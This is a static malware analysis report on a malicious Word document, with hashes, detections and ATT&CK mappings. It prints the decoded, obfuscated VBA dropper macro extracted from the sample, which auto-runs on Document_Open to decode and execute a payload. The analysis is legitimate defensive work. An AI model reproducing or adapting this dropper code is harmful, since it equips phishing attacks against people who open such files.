Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01528c87460d8f62…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 313.5 KB
Created: 2017-11-21 13:11:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: e451c1d655458eb9a5c21f5fb07a6a24
SHA-1: 3e6b74e88f382129f715bf51c95228f1812db87f
SHA-256: 01528c87460d8f624129e196d5ca318ed7be5a0043f7ad7e1039f49265eb1fca
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6409921-0' further supports its malicious nature. The embedded URL is suspicious and likely serves as the initial point of contact for the payload.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6409921-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6409921-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The document contains a Document_Open macro, which runs automatically when the document is opened.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ | In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography | In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml | In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7989 bytes
SHA-256: f5795943ed624beac2a75cb0cd6ffd01cf5caa3a7bdda1ec08975701c89d59af

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Dim europeanization As Variant
Dim faenum As Variant
achromatous
alarmingly = 25 + 15
 Pmt 0, alarmingly, 5329, 47642, 8
End Sub
Sub achromatous()
unwelcome.rapt.Value = Day(#12/5/2013#)
Set aorist = unwelcome.rapt.SelectedItem
neoplasia = 43 + 7
Pmt 0, neoplasia, 24744, 31974, 5
mountains = aorist.Name
meteorologist = 92 - 58 + 7810
locofoco = Right(mountains, meteorologist)
victimize = enceliopsis(locofoco)
intolerable = 20 + 18
Pmt 0, intolerable, 32628, 11229, 5
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim biliary As LongPtr
Dim atole As LongPtr
Dim quicksands As LongPtr
Dim novice As LongPtr
Authorsr = 69 - 25 + 2020
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim atole As Long
Dim biliary As Long
Dim quicksands As Long
toimeme = 11 - 17 + 787
Dim novice As Long
Authorsr = toimeme + 3459
#End If
psychology = 60 + 33
Pmt 0, psychology, 31062, 23258, 6
shikar = 51 + 15
Pmt 0, shikar, 19616, 32862, 2
cestum = victimize
biliary = mildran.eyelid(cestum)
Dim existentialist As Byte
Dim rooted As Long
quicksands = 36 - 18 - 18
atole = biliary + Authorsr
novice = 3 - 10 + 201534
alea = clarinetist(novice, _
quicksands, _
atole, quicksands, _
quicksands, quicksands, quicksands)
inequitably = 20 + 20
Pmt 0, inequitably, 32517, 23183, 5
End Sub

Function enceliopsis(unmodulated) As String
Dim ratione As Long
montevideo = Math.Round(284)
homogeneously = "flanking"
Dim metabolite(63) As Long
Dim commutative As Long
Dim corrival(63) As Long
Dim disprove(63) As Long
Dim nauseate As Long
Dim hoarder() As Byte
Dim farkleberry As Long
Dim e(6962) As Byte
advisee = 45 - 121 + 332
mb = 122 - 97 + 230
eagle = 124 - 25 - 35
Dim cowper As Integer
department = 27 - 94 + 65347
gravel = 76 - 2 + 262070
chattel = 100 - 5 + 16711585
ivory = 126 - 90 + 65500
detractory = 37 - 97 + 4156
Dim montanan As String
materialize = 96 - 41 - 55
cancellated = 12 - 99 + 7930
Dim oscine() As Byte
Dim beamends As String
Dim malva As Integer
oscine = VBA.StrConv(unmodulated, 128)
Dim unambitious As Long
tanglebush = 37 + 21
Pmt 0, tanglebush, 4973, 55252, 5
lightfooted = 7840 + 3
CloseUp = vbKeyShift - 12
For hormone = (3 - 3) To lightfooted
If hormone Mod 2 = (4 - 4) Then
oscine(hormone) = oscine(hormone) - CloseUp
Else
oscine(hormone) = oscine(hormone) - (CloseUp - 1)
End If
Next hormone
surface = 30 + 3
Pmt 0, surface, 9375, 44249, 7
kappa = zambia
For nauseate = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
disprove(nauseate) = atopognosia(nauseate, eagle, 66)
corrival(nauseate) = atopognosia(nauseate, detractory, 66)
metabolite(nauseate) = atopognosia(nauseate, gravel, 66)
Next nauseate
grievously = 49 + 50
Pmt 0, grievously, 18764, 37821, 8
hoarder = oscine
apollyon = 19 + 36
Pmt 0, apollyon, 26387, 26777, 5
hardearned = 24 - 110 + 89
adenoidal = Fix(416)
montevideo = Rnd(198)
multiply = hardearned + 1
hourglass = 6 - 61 + 57
For commutative = (5 - 5) To lightfooted
galop = hoarder(commutative)
compositor = hoarder(commutative + 2)
pharmacological = corrival(kappa(hoarder(commutative + 1)))
issus = disprove(kappa(compositor)) + kappa(hoarder(commutative + hardearned))
ratione = metabolite(kappa(galop)) + pharmacological + issus
nauseate = atopognosia(ratione, chattel, 58)
e(farkleberry) = atopognosia(nauseate, ivory, 48)
nauseate = atopognosia(ratione, department, 58)
e(farkleberry + 1) = atopognosia(nauseate, advisee, 48)
e(farkleberry + hourglass) = atopognosia(ratione, mb, 58)
farkleberry = farkleberry + hourglass + 1
commutative = commutative + 3
Next
enceliopsis = e
End Function


Attribute VB_Name = "sideboard"
'  Es ist kalt und regungslos
#If (13 * 3 + 5)
... (truncated)